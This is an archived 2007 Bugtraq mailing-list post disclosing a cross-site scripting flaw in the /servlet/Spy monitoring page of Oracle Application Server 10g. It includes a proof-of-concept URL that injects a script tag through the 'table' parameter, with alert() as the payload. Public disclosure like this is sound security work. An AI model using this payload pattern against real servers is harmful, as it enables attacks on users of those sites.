lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <d87b1b190703200314x770c799dja2a1ce811d09c0c1@mail.gmail.com> Date: Tue, 20 Mar 2007 12:14:20 +0200 From: "Sea Shark" <sead3nx@...il.com> To: bugtraq@...urityfocus.com Subject: Oracle 10g Dynamic Monitoring Services XSS /servlet/Spy Hi, Access to http://somesite/servlet/Spy should be restricted. But generally database or system administrators ignore the hardening of Oracle apllications or database. I have noticed XSS bug in Dynamic Monitoring services on Oracle-Application-Server-10g/10.1.2.0.0. http://somesite/servlet/Spy?format=metrictable&cache=false&interval=6400000&table=%3Cscript%3Ealert('inTellectPRO')%3C/script%3E&orderby=Name d3nx